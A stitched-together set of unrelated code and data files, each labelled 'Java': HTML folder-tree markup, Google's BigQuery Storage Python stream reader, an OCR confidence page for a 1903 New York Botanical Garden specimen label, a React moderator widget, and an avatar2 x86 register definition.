class="text">core</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">out</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">dom</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">css</div> </div> <div class="childs"></div> </div> <div class="txt last close"> <div class="tag"> <div class="text">createdom</div> </div> <div class="childs"></div> </div> </div> </div> <div class="folder last close"> <div class="tag"> <div class="text">grid</div> </div> <div class="childs"> <div class="txt normal close"> <div class="tag"> <div class="text">basis</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">extend</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">core</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">out</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">dom</div> </div> <div class="childs"></div> </div> <div class="txt normal close"> <div class="tag"> <div class="text">css</div> </div> <div class="childs"></div> </div> <div class="txt last close"> <div class="tag"> <div class="text">createdom</div> </div> <div class="childs"></div> </div> </div> </div> </div> </div> </div> </body> </html>
Java
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import import collections import io import json import time try: import fastavro except ImportError: # pragma: NO COVER fastavro = None import google.api_core.exceptions import google.rpc.error_details_pb2 try: import pandas except ImportError: # pragma: NO COVER pandas = None try: import pyarrow except ImportError: # pragma: NO COVER pyarrow = None try: import pyarrow except ImportError: # pragma: NO COVER pyarrow = None _STREAM_RESUMPTION_EXCEPTIONS = ( google.api_core.exceptions.ServiceUnavailable, # Caused by transport-level error. No status code was received. # https://github.com/googleapis/python-bigquery-storage/issues/262 google.api_core.exceptions.Unknown, ) # The Google API endpoint can unexpectedly close long-running HTTP/2 streams. # Unfortunately, this condition is surfaced to the caller as an internal error # by gRPC. We don't want to resume on all internal errors, so instead we look # for error message that we know are caused by problems that are safe to # reconnect. _STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES = ( # See: https://github.com/googleapis/google-cloud-python/pull/9994 "RST_STREAM", ) _FASTAVRO_REQUIRED = ( "fastavro is required to parse ReadRowResponse messages with Avro bytes." ) _PANDAS_REQUIRED = "pandas is required to create a DataFrame" _PYARROW_REQUIRED = ( "pyarrow is required to parse ReadRowResponse messages with Arrow bytes." ) class ReadRowsStream(object): """A stream of results from a read rows request. This stream is an iterable of :class:`~google.cloud.bigquery_storage_v1.types.ReadRowsResponse`. Iterate over it to fetch all row messages. If the fastavro library is installed, use the :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.rows()` method to parse all messages into a stream of row dictionaries. If the pandas and fastavro libraries are installed, use the :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.to_dataframe()` method to parse all messages into a :class:`pandas.DataFrame`. This object should not be created directly, but is returned by other methods in this library. """ def __init__( self, client, name, offset, read_rows_kwargs, retry_delay_callback=None ): """Construct a ReadRowsStream. Args: client ( \ ~google.cloud.bigquery_storage_v1.services. \ big_query_read.BigQueryReadClient \ ): A GAPIC client used to reconnect to a ReadRows stream. This must be the GAPIC client to avoid a circular dependency on this class. name (str): Required. Stream ID from which rows are being read. offset (int): Required. Position in the stream to start reading from. The offset requested must be less than the last row read from ReadRows. Requesting a larger offset is undefined. read_rows_kwargs (dict): Keyword arguments to use when reconnecting to a ReadRows stream. retry_delay_callback (Optional[Callable[[float], None]]): If the client receives a retryable error that asks the client to delay its next attempt and retry_delay_callback is not None, ReadRowsStream will call retry_delay_callback with the delay duration (in seconds) before it starts sleeping until the next attempt. Returns: Iterable[ \ ~google.cloud.bigquery_storage.types.ReadRowsResponse \ ]: A sequence of row messages. """ # Make a copy of the read position so that we can update it without # mutating the original input. self._client = client self._name = name self._offset = offset self._read_rows_kwargs = read_rows_kwargs self._retry_delay_callback = retry_delay_callback self._wrapped = None def __iter__(self): """An iterable of messages. Returns: Iterable[ \ ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \ ]: A sequence of row messages. """ # Infinite loop to reconnect on reconnectable errors while processing # the row stream. if self._wrapped is None: self._reconnect() while True: try: for message in self._wrapped: rowcount = message.row_count self._offset += rowcount yield message return # Made it through the whole stream. except google.api_core.exceptions.InternalServerError as exc: resumable_error = any( resumable_message in exc.message for resumable_message in _STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES ) if not resumable_error: raise except _STREAM_RESUMPTION_EXCEPTIONS: # Transient error, so reconnect to the stream. pass except Exception as exc: if not self._resource_exhausted_exception_is_retryable(exc): raise self._reconnect() def _reconnect(self): """Reconnect to the ReadRows stream using the most recent offset.""" while True: try: self._wrapped = self._client.read_rows( read_stream=self._name, offset=self._offset, **self._read_rows_kwargs ) break except Exception as exc: if not self._resource_exhausted_exception_is_retryable(exc): raise def _resource_exhausted_exception_is_retryable(self, exc): if isinstance(exc, google.api_core.exceptions.ResourceExhausted): # ResourceExhausted errors are only retried if a valid # RetryInfo is provided with the error. # # TODO: Remove hasattr logic when we require google-api-core >= 2.2.0. # ResourceExhausted added details/_details in google-api-core 2.2.0. details = None if hasattr(exc, "details"): details = exc.details elif hasattr(exc, "_details"): details = exc._details if details is not None: for detail in details: if isinstance(detail, google.rpc.error_details_pb2.RetryInfo): retry_delay = detail.retry_delay if retry_delay is not None: delay = max( 0, float(retry_delay.seconds) + (float(retry_delay.nanos) / 1e9), ) if self._retry_delay_callback: self._retry_delay_callback(delay) time.sleep(delay) return True return False def rows(self, read_session=None): """Iterate over all rows in the stream. This method requires the fastavro library in order to parse row messages in avro format. For arrow format messages, the pyarrow library is required. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: read_session ( \ Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. Returns: Iterable[Mapping]: A sequence of rows, represented as dictionaries. """ return ReadRowsIterable(self, read_session=read_session) def to_arrow(self, read_session=None): """Create a :class:`pyarrow.Table` of all rows in the stream. This method requires the pyarrow library and a stream using the Arrow format. Args: read_session ( \ ~google.cloud.bigquery_storage_v1.types.ReadSession \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. Returns: pyarrow.Table: A table of all rows in the stream. """ return self.rows(read_session=read_session).to_arrow() def to_dataframe(self, read_session=None, dtypes=None): """Create a :class:`pandas.DataFrame` of all rows in the stream. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings. Args: read_session ( \ ~google.cloud.bigquery_storage_v1.types.ReadSession \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. """ if pandas is None: raise ImportError(_PANDAS_REQUIRED) return self.rows(read_session=read_session).to_dataframe(dtypes=dtypes) class ReadRowsIterable(object): """An iterable of rows from a read session. Args: reader (google.cloud.bigquery_storage_v1.reader.ReadRowsStream): A read rows stream. read_session ( \ Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \ ): DEPRECATED. This argument was used to specify the schema of the rows in the stream, but now the first message in a read stream contains this information. """ # This class is modelled after the google.cloud.bigquery.table.RowIterator # and aims to be API compatible where possible. def __init__(self, reader, read_session=None): self._reader = reader if read_session is not None: self._stream_parser = _StreamParser.from_read_session(read_session) else: self._stream_parser = None @property def pages(self): """A generator of all pages in the stream. Returns: types.GeneratorType[google.cloud.bigquery_storage_v1.ReadRowsPage]: A generator of pages. """ # Each page is an iterator of rows. But also has num_items, remaining, # and to_dataframe. for message in self._reader: # Only the first message contains the schema, which is needed to # decode the messages. if not self._stream_parser: self._stream_parser = _StreamParser.from_read_rows_response(message) yield ReadRowsPage(self._stream_parser, message) def __iter__(self): """Iterator for each row in all pages.""" for page in self.pages: for row in page: yield row def to_arrow(self): """Create a :class:`pyarrow.Table` of all rows in the stream. This method requires the pyarrow library and a stream using the Arrow format. Returns: pyarrow.Table: A table of all rows in the stream. """ record_batches = [] for page in self.pages: record_batches.append(page.to_arrow()) if record_batches: return pyarrow.Table.from_batches(record_batches) # No data, return an empty Table. self._stream_parser._parse_arrow_schema() return pyarrow.Table.from_batches([], schema=self._stream_parser._schema) def to_dataframe(self, dtypes=None): """Create a :class:`pandas.DataFrame` of all rows in the stream. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. """ if pandas is None: raise ImportError(_PANDAS_REQUIRED) if dtypes is None: dtypes = {} # If it's an Arrow stream, calling to_arrow, then converting to a # pandas dataframe is about 2x faster. This is because pandas.concat is # rarely no-copy, whereas pyarrow.Table.from_batches + to_pandas is # usually no-copy. try: record_batch = self.to_arrow() except NotImplementedError: pass else: df = record_batch.to_pandas() for column in dtypes: df[column] = pandas.Series(df[column], dtype=dtypes[column]) return df frames = [page.to_dataframe(dtypes=dtypes) for page in self.pages] if frames: return pandas.concat(frames) # No data, construct an empty dataframe with columns matching the schema. # The result should be consistent with what an empty ARROW stream would produce. self._stream_parser._parse_avro_schema() schema = self._stream_parser._avro_schema_json column_dtypes = self._dtypes_from_avro(schema["fields"]) column_dtypes.update(dtypes) df = pandas.DataFrame(columns=column_dtypes.keys()) for column in df: df[column] = pandas.Series([], dtype=column_dtypes[column]) return df def _dtypes_from_avro(self, avro_fields): """Determine Pandas dtypes for columns in Avro schema. Args: avro_fields (Iterable[Mapping[str, Any]]): Avro fields' metadata. Returns: colelctions.OrderedDict[str, str]: Column names with their corresponding Pandas dtypes. """ result = collections.OrderedDict() type_map = {"long": "int64", "double": "float64", "boolean": "bool"} for field_info in avro_fields: # If a type is an union of multiple types, pick the first type # that is not "null". if isinstance(field_info["type"], list): type_info = next(item for item in field_info["type"] if item != "null") if isinstance(type_info, str): field_dtype = type_map.get(type_info, "object") else: logical_type = type_info.get("logicalType") if logical_type == "timestamp-micros": field_dtype = "datetime64[ns, UTC]" else: field_dtype = "object" result[field_info["name"]] = field_dtype return result class ReadRowsPage(object): """An iterator of rows from a read session message. Args: stream_parser (google.cloud.bigquery_storage_v1.reader._StreamParser): A helper for parsing messages into rows. message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse): A message of data from a read rows stream. """ # This class is modeled after google.api_core.page_iterator.Page and aims # to provide API compatibility where possible. def __init__(self, stream_parser, message): self._stream_parser = stream_parser self._message = message self._iter_rows = None self._num_items = self._message.row_count self._remaining = self._message.row_count def _parse_rows(self): """Parse rows from the message only once.""" if self._iter_rows is not None: return rows = self._stream_parser.to_rows(self._message) self._iter_rows = iter(rows) @property def num_items(self): """int: Total items in the page.""" return self._num_items @property def remaining(self): """int: Remaining items in the page.""" return self._remaining def __iter__(self): """A ``ReadRowsPage`` is an iterator.""" return self def next(self): """Get the next row in the page.""" self._parse_rows() if self._remaining > 0: self._remaining -= 1 return next(self._iter_rows) # Alias needed for Python 2/3 support. __next__ = next def to_arrow(self): """Create an :class:`pyarrow.RecordBatch` of rows in the page. Returns: pyarrow.RecordBatch: Rows from the message, as an Arrow record batch. """ return self._stream_parser.to_arrow(self._message) def to_dataframe(self, dtypes=None): """Create a :class:`pandas.DataFrame` of rows in the page. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. """ if pandas is None: raise ImportError(_PANDAS_REQUIRED) return self._stream_parser.to_dataframe(self._message, dtypes=dtypes) class _StreamParser(object): def to_arrow(self, message): raise NotImplementedError("Not implemented.") def to_dataframe(self, message, dtypes=None): raise NotImplementedError("Not implemented.") def to_rows(self, message): raise NotImplementedError("Not implemented.") def _parse_avro_schema(self): raise NotImplementedError("Not implemented.") def _parse_arrow_schema(self): raise NotImplementedError("Not implemented.") @staticmethod def from_read_session(read_session): schema_type = read_session._pb.WhichOneof("schema") if schema_type == "avro_schema": return _AvroStreamParser(read_session) elif schema_type == "arrow_schema": return _ArrowStreamParser(read_session) else: raise TypeError( "Unsupported schema type in read_session: {0}".format(schema_type) ) @staticmethod def from_read_rows_response(message): schema_type = message._pb.WhichOneof("schema") if schema_type == "avro_schema": return _AvroStreamParser(message) elif schema_type == "arrow_schema": return _ArrowStreamParser(message) else: raise TypeError( "Unsupported schema type in message: {0}".format(schema_type) ) class _AvroStreamParser(_StreamParser): """Helper to parse Avro messages into useful representations.""" def __init__(self, message): """Construct an _AvroStreamParser. Args: message (Union[ google.cloud.bigquery_storage_v1.types.ReadSession, \ google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \ ]): Either the first message of data from a read rows stream or a read session. Both types contain a oneof "schema" field, which can be used to determine how to deserialize rows. """ if fastavro is None: raise ImportError(_FASTAVRO_REQUIRED) self._first_message = message self._avro_schema_json = None self._fastavro_schema = None self._column_names = None def to_arrow(self, message): """Create an :class:`pyarrow.RecordBatch` of rows in the page. Args: message (google.cloud.bigquery_storage_v1.types.ReadRowsResponse): Protocol buffer from the read rows stream, to convert into an Arrow record batch. Returns: pyarrow.RecordBatch: Rows from the message, as an Arrow record batch. """ raise NotImplementedError("to_arrow not implemented for Avro streams.") def to_dataframe(self, message, dtypes=None): """Create a :class:`pandas.DataFrame` of rows in the page. This method requires the pandas libary to create a data frame and the fastavro library to parse row messages. .. warning:: DATETIME columns are not supported. They are currently parsed as strings in the fastavro library. Args: message ( \ ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \ ): A message containing Avro bytes to parse into a pandas DataFrame. dtypes ( \ Map[str, Union[str, pandas.Series.dtype]] \ ): Optional. A dictionary of column names pandas ``dtype``s. The provided ``dtype`` is used when constructing the series for the column specified. Otherwise, the default pandas behavior is used. Returns: pandas.DataFrame: A data frame of all rows in the stream. """ self._parse_avro_schema() if dtypes is None: dtypes = {} columns = collections.defaultdict(list) for row in self.to_rows(message): for column in row: columns[column].append(row[column]) for column in dtypes: columns[column] = pandas.Series(columns[column], dtype=dtypes[column]) return pandas.DataFrame(columns, columns=self._column_names) def _parse_avro_schema(self): """Extract and parse Avro schema from a read session.""" if self._avro_schema_json: return self._avro_schema_json = json.loads(self._first_message.avro_schema.schema) self._column_names = tuple( (field["name"] for field in self._avro_schema_json["fields"]) ) self._first_message = None def _parse_fastavro(self): """Convert parsed Avro schema to fastavro format.""" self._parse_avro_schema() self._fastavro_schema = fastavro.parse_schema(self._avro_schema_json) def to_rows(self, message): """Parse all rows in a stream message. Args: message ( \ ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \ ): A message containing Avro bytes to parse into rows. Returns: Iterable[Mapping]: A sequence of rows, represented as dictionaries. """ self._parse_fastavro() messageio = io.BytesIO(message.avro_rows.serialized_binary_rows) while True: # Loop in a while loop because schemaless_reader can only read # a single record. try: # TODO: Parse DATETIME into datetime.datetime (no timezone), # instead of as a string. yield fastavro.schemaless_reader(messageio, self._fastavro_schema) except StopIteration: break # Finished with message class _ArrowStreamParser(_StreamParser): def __init__(self, message): """Construct an _ArrowStreamParser. Args: message (Union[ google.cloud.bigquery_storage_v1.types.ReadSession, \ google.cloud.bigquery_storage_v1.types.ReadRowsResponse, \ ]): Either the first message of data from a read rows stream or a read session. Both types contain a oneof "schema" field, which can be used to determine how to deserialize rows. """ if pyarrow is None: raise ImportError(_PYARROW_REQUIRED) self._first_message = message self._schema = None def to_arrow(self, message): return self._parse_arrow_message(message) def to_rows(self, message): record_batch = self._parse_arrow_message(message) # Iterate through each column simultaneously, and make a dict from the # row values for row in zip(*record_batch.columns): yield dict(zip(self._column_names, row)) def to_dataframe(self, message, dtypes=None): record_batch = self._parse_arrow_message(message) if dtypes is None: dtypes = {} df = record_batch.to_pandas() for column in dtypes: df[column] = pandas.Series(df[column], dtype=dtypes[column]) return df def _parse_arrow_message(self, message): self._parse_arrow_schema() return pyarrow.ipc.read_record_batch( pyarrow.py_buffer(message.arrow_record_batch.serialized_record_batch), self._schema, ) def _parse_arrow_schema(self): if self._schema: return self._schema = pyarrow.ipc.read_schema( pyarrow.py_buffer(self._first_message.arrow_schema.serialized_schema) ) self._column_names = [field.name for field in self._schema] self._first_message = None
Java
<html> <head> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <span class='rank0 0.0'>?Y0V</span> </br> <span class='rank4 4.488678160318237'>BOTANIC</span> <span class='rank0 0.0'>A</span> </br> <span class='rank0 0.0'>S¨'Ç</span> </br> <span class='rank8 8.229688880941637'>Wmm</span> </br> <span class='rank6 6.033766030327724'>THE</span> <span class='rank5 5.23758013687111'>NEW</span> <span class='rank5 5.092407184714711'>YORK</span> <span class='rank4 4.3452095742978045'>BOTANICAL</span> <span class='rank5 4.836230413135688'>GARDEN</span> </br> <span class='rank2 2.3388802077460475'>Plants</span> <span class='rank17 16.624349504197816'>oolleoteo</span> <span class='rank5 5.3627373972535715'>in</span> <span class='rank5 4.551609905707915'>the</span> <span class='rank-5 -5.170260790072973'>Republio</span> <span class='rank6 6.129628052059067'>of</span> <span class='rank21 21.233121605410794'>Hayti</span> <span class='rank7 7.495719705861437'>by</span> <span class='rank0 -0.2451656111325633'>George</span> <span class='rank10 10.021448350169694'>V.</span> <span class='rank-1 -0.5281890597046726'>Nash,</span> <span class='rank4 3.522999256660679'>1903</span> </br> <span class='rank4 4.079395259471763'>PORT</span> <span class='rank15 15.0908332066196'>MARGOT</span> <span class='rank7 6.555712447369967'>TO</span> <span class='rank22 22.325897378282733'>CORREIL,</span> <span class='rank7 6.807446127280642'>AUG.</span> </br> <span class='rank6 5.910214491268059'>New</span> <span class='rank5 5.027215308896533'>York</span> <span class='rank3 2.5421264334187086'>Botanical</span> <span class='rank3 3.451197890939337'>Garden</span> </br> <span class='rank0 0.0'>6</span> <span class='rank0 0.0'>7</span> <span class='rank0 0.0'>8</span> <span class='rank0 0.0'>9</span> <span class='rank6 5.886281793427337'>10</span> <span class='rank0 0.0'>T</span> <span class='rank0 0.0'>ã</span> <span class='rank0 0.0'>v</span> </br> <span class='rank0 0.0'>?f</span> <span class='rank5 5.380675333968457'>The</span> <span class='rank6 5.910214491268059'>New</span> <span class='rank5 5.027215308896533'>York</span> <span class='rank4 4.050174224831018'>copyright</span> <span class='rank2 1.7822710117187128'>reserved</span> <span class='rank0 -0.3482453244774675'>botanical</span> <span class='rank3 3.451197890939337'>Garden</span> </br> <span class='rank18 17.536343746729663'>1622564</span> </br> </br></br> <strong>Legend - </strong> Level of confidence that token is an accurately-transcribed word</br> <span class='rank-13'>&nbsp;&nbsp;&nbsp;</span> extremely low <span class='rank-7'>&nbsp;&nbsp;&nbsp;</span> very low <span class='rank-1'>&nbsp;&nbsp;&nbsp;</span> low <span class='rank0'>&nbsp;&nbsp;&nbsp;</span> undetermined <span class='rank1'>&nbsp;&nbsp;&nbsp;</span> medium <span class='rank6'>&nbsp;&nbsp;&nbsp;</span> high <span class='rank16'>&nbsp;&nbsp;&nbsp;</span> very high</br> </body> </html>
Java
/* Copyright 2019 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ import { Map, Set } from 'immutable'; import React from 'react'; import { Link } from 'react-router-dom'; import { OpenInNew, PersonAdd } from '@material-ui/icons/'; import { IArticleModel, ICategoryModel, IUserModel, ModelId } from '../../../models'; import { Avatar, MagicTimestamp, PseudoAvatar } from '../../components'; import { COMMON_STYLES, IMAGE_BASE } from '../../stylesx'; import { css, stylesheet } from '../../utilx'; interface IModeratorsWidgetProps { users: Map<string, IUserModel>; moderatorIds: Array<ModelId>; superModeratorIds: Array<ModelId>; openSetModerators(): void; } export const MODERATOR_WIDGET_STYLES = stylesheet({ widget: { display: 'flex', flexWrap: 'wrap', justifyContent: 'center', }, }); export function ModeratorsWidget(props: IModeratorsWidgetProps) { const { users, moderatorIds, superModeratorIds } = props; let s = Set(moderatorIds); if (superModeratorIds) { s = s.merge(superModeratorIds); } const moderators = s.toArray().map((uid: string) => users.get(uid)); if (moderators.length === 0) { return ( <div onClick={props.openSetModerators} {...css(MODERATOR_WIDGET_STYLES.widget)}> <PseudoAvatar size={IMAGE_BASE}> <PersonAdd/> </PseudoAvatar> </div> ); } if (moderators.length === 1) { const u = moderators[0]; return ( <div onClick={props.openSetModerators} {...css(MODERATOR_WIDGET_STYLES.widget)}> <Avatar target={u} size={IMAGE_BASE}/> </div> ); } const ret = []; let limit = moderators.length; let extra = false; if (limit > 4) { limit = 3; extra = true; } else if (limit === 4) { limit = 4; } for (let i = 0; i < limit; i++) { ret.push(<Avatar target={moderators[i]} size={IMAGE_BASE / 2}/>); } if (extra) { ret.push(<PseudoAvatar size={IMAGE_BASE / 2}>+{moderators.length - 3}</PseudoAvatar>); } return ( <div onClick={props.openSetModerators} {...css(MODERATOR_WIDGET_STYLES.widget)}> {ret} </div> ); } export const TITLE_CELL_STYLES = stylesheet({ superText: { fontSize: '10px', fontWeight: '600', color: 'rgba(0,0,0,0.54)', }, categoryLabel: { textTransform: 'uppercase', marginRight: '12px', }, mainText: { display: 'flex', }, mainTextText: { lineHeight: '20px', }, mainTextLink: { padding: '0 10px', color: 'rgba(0,0,0,0.54)', }, }); interface ITitleCellProps { category?: ICategoryModel; article: IArticleModel; link: string; } export function TitleCell(props: ITitleCellProps) { const { category, article, link, } = props; const supertext = []; if (category) { supertext.push(<span key="label" {...css(TITLE_CELL_STYLES.categoryLabel)}>{category.label}</span>); } if (article.sourceCreatedAt) { supertext.push(( <span key="timestamp"> <MagicTimestamp timestamp={article.sourceCreatedAt} inFuture={false}/> </span> )); } return ( <> {supertext.length > 0 && <div {...css(TITLE_CELL_STYLES.superText)}>{supertext}</div>} <div {...css(TITLE_CELL_STYLES.mainText)}> <div> <Link to={link} {...css(COMMON_STYLES.cellLink, TITLE_CELL_STYLES.mainTextText)}> {article.title} </Link> </div> {article.url && ( <div {...css(TITLE_CELL_STYLES.mainTextLink)}> <a key="link" href={article.url} target="_blank" {...css(COMMON_STYLES.cellLink)}> <OpenInNew fontSize="small" /> </a> </div> )} </div> </> ); }
Java
from capstone import * from .architecture import Architecture from avatar2.installer.config import GDB_X86, OPENOCD class X86(Architecture): get_gdb_executable = Architecture.resolve(GDB_X86) get_oocd_executable = Architecture.resolve(OPENOCD) qemu_name = 'i386' gdb_name = 'i386' registers = {'eax': 0, 'ecx': 1, 'edx': 2, 'ebx': 3, 'esp': 4, 'ebp': 5, 'esi': 6, 'edi': 7, 'eip': 8, 'pc': 8, 'eflags': 9, 'cs': 10, 'ss': 11, 'ds': 12, 'es': 13, 'fs': 14, 'gs': 15, } special_registers = { #SSE 'xmm0': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm0.v4_int32', }, 'xmm1': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm1.v4_int32', }, 'xmm2': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm2.v4_int32', }, 'xmm3': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm3.v4_int32', }, 'xmm4': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm4.v4_int32', }, 'xmm5': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm5.v4_int32', }, 'xmm6': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm6.v4_int32', }, 'xmm7': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm7.v4_int32', }, 'xmm8': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm8.v4_int32', }, 'xmm9': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm9.v4_int32', }, 'xmm10': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm10.v4_int32', }, 'xmm11': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm11.v4_int32', }, 'xmm12': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm12.v4_int32', }, 'xmm13': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm13.v4_int32', }, 'xmm14': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm14.v4_int32', }, 'xmm15': {'format': '{{{:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$xmm15.v4_int32', }, #AVX 'ymm0': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm0.v8_int32', }, 'ymm1': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm1.v8_int32', }, 'ymm2': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm2.v8_int32', }, 'ymm3': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm3.v8_int32', }, 'ymm4': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm4.v8_int32', }, 'ymm5': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm5.v8_int32', }, 'ymm6': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm6.v8_int32', }, 'ymm7': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm7.v8_int32', }, 'ymm8': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm8.v8_int32', }, 'ymm9': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm9.v8_int32', }, 'ymm10': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm10.v8_int32', }, 'ymm11': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm11.v8_int32', }, 'ymm12': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm12.v8_int32', }, 'ymm13': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm13.v8_int32', }, 'ymm14': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm14.v8_int32', }, 'ymm15': {'format': '{{{:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}, {:d}}}', 'gdb_expression': '$ymm15.v8_int32', }, } sr_name = 'eflags' unemulated_instructions = [] capstone_arch = CS_ARCH_X86 capstone_mode = CS_MODE_32 word_size = 32 class X86_64(X86): qemu_name = 'x86_64' gdb_name = 'i386:x86-64' registers = {'rax': 0, 'rbx': 1, 'rcx': 2, 'rdx': 3, 'rsi': 4, 'rdi': 5, 'rbp': 6, 'rsp': 7, 'r8': 8, 'r9': 9, 'r10': 10, 'r11': 11, 'r12': 12, 'r13': 13, 'r14': 14, 'r15': 15, 'rip': 16, 'pc': 16, 'eflags': 17, 'cs': 18, 'ss': 19, 'ds': 20, 'es': 21, 'fs': 22, 'gs': 23, } capstone_mode = CS_MODE_64 unemulated_instructions = [] capstone_mode = CS_MODE_64 word_size = 64
Java
